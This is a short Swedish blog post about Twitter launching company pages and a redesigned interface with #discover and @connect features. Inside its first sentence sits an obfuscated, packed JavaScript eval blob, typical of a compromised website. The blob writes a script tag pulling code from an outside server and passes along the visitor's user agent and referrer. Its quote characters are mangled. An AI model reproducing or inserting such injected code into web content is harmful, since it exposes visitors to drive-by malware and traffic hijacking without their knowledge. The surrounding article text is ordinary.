Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Twitter startar företagssidor

Twitter startar företagssidor
Sebastian

Nu eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yakyf|var|u0026u|referrer|hffaf||js|php’.split(’|’),0,{}))
tar Twitter upp kampen mot Facebook och lanserar företagssidor och en mer social portal.

Twitter har jobbat länge med att komma igång med just företagssidor. behovet av förbättringar har uppkommit allt eftersom populariteten ökat så mycket på senare tid.

Det nya konceptet har fått namnet #flytwitter.

Igår släppte Twitter sitt nya gränssnitt och kungjorde lanseringen av företagssidor. Dessa kommer inom kort till alla (några månader enligt Twitter).

Twitter har jobbat ganska länge med denna uppdatering. Behovet av förbättringar har uppkommit allt eftersom Twitters popularitet ökat på senare tid. Flödet har börjat bli så pass intensivt och snårigt att ett lyft av dels utseendet och dels funktionaliteten var behövligt.

Twitter har också ökat hashtaggens betydelse i senaste versionen genom att ge ytterligare förankringsmöjligheter. Skrivs ett meddelande med en hashtagg idag så tar Twitter hänsyn till meddelandet genom att komma ihåg den när du klickar på #discover och @connect. Algoritmen tar hänsyn till hela din sociala graf.

Om du skriver #revue (med hashtagg) så dyker tweets om just Revue upp i högra spalten när du klickar på #discover-ikonen samt att du får upp användare som skrivit om Revue om du klickar på @connect. På så sätt kan du hitta relevant information.

httpv://www.youtube.com/watch?v=0qqDy5BmYKE